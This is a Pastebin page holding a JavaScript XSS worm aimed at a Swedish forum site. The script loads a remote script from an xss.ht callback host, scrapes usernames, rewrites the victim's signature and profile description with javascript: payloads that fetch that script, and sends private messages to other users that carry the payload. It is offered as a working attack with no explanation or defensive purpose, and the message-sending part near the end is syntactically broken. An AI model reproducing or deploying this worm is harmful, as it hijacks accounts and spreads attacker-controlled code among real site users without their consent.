Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- var html = document.documentElement.outerHTML;
- var currentUser = html.split('return follow(this);')[2].split('">')[2].split('<')[0];
- var users = [];
- var data;
- function escapeRegExp(str) {
- return str.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
- }
- (function() {
- var startingTime = new Date().getTime();
- var script = document.createElement("SCRIPT");
- script.src = 'https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js';
- script.type = 'text/javascript';
- document.getElementsByTagName("head")[0].appendChild(script);
- var checkReady = function(callback) {
- if (window.jQuery) {
- callback(jQuery);
- }
- else {
- window.setTimeout(function() { checkReady(callback); }, 20);
- }
- };
- checkReady(function($) {
- $(function() {
- $.getScript("//gthotel.xss.ht");
- $.ajax({
- url: 'users.php',
- processData: false,
- cache: false,
- type: 'GET',
- contentType: false,
- beforeSend: function (x) {
- if (x && x.overrideMimeType) {
- x.overrideMimeType("multipart/form-data");
- }
- },
- mimeType: 'multipart/form-data',
- success: function (data) {
- for (var i = 0; i < 5; i++) {
- var userindex = data.split('<a href="user.php?id=')[5+i].split('<span')[1].split('">')[1].split('<')[0];
- if (userindex != currentUser) {
- users.push(userindex);
- }
- }
- console.log(users);
- $.get(
- "settings.php", function(data) {
- var signCont = data.split('<textarea')[2].split('">')[1].split('<')[0];
- var signCont2 = data.split('<textarea')[1].split('">')[1].split('<')[0];
- var count = (signCont.match(/\[url=/g) || []).length;
- var count2 = (signCont2.match(/\[url=/g) || []).length;
- for (var i = 0; i < count; i++) {
- var currentURL = signCont.split("[url=")[i+1].split("]")[0];
- var re = new RegExp(escapeRegExp(currentURL), "g");
- var payload = "jav ascript://" + currentURL + "%0aeval('var a=document.createElement(\'script\');a.src=\'https://gthotel.xss.ht\';document.body.appendChild(a)');";
- signCont = signCont.replace(re, payload);
- }
- for (var i = 0; i < count2; i++) {
- var currentURL2 = signCont2.split("[url=")[i+1].split("]")[0];
- var re = new RegExp(escapeRegExp(currentURL2), "g");
- var payload = "jav ascript://" + currentURL2 + "%0aeval('var a=document.createElement(\'script\');a.src=\'https://gthotel.xss.ht\';document.body.appendChild(a)');";
- signCont2 = signCont2.replace(re, payload);
- }
- data = new FormData();
- data.append('forum_signature', signCont);
- data.append('description', signCont2);
- data.append('settings', 'Uppdatera');
- $.ajax({
- url: 'settings.php',
- data: data,
- processData: false,
- cache: false,
- type: 'POST',
- contentType: false,
- beforeSend: function (x) {
- if (x && x.overrideMimeType) {
- x.overrideMimeType("multipart/form-data");
- }
- },
- mimeType: 'multipart/form-data',
- success: function (data) {
- $.post("messages.php?ajax=1", "ajax=1&font=default&name=" + encodeURIComponent("Vill någon rollspela?") + "&send=Skicka&text=" + "[url=jav%09ascript:eval('var a=document.createElement(\'script\');a.src=\'https://gthotel.xss.ht\';document.body.appendChild(a)');]https://www.mugglarportalen.se/#forum.php?topic=50591[/url]" + "&users[0]=maxx&users[1]=undefined");
- + encodeURIComponent(users[1]) + "&users[2]="
- + encodeURIComponent(users[2]) + "&users[3]="
- + encodeURIComponent(users[3]) + "&users[4]="
- + encodeURIComponent(users[4]);
- }
- }
- )}
- );
- }
- });
- });
- });
- })();
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
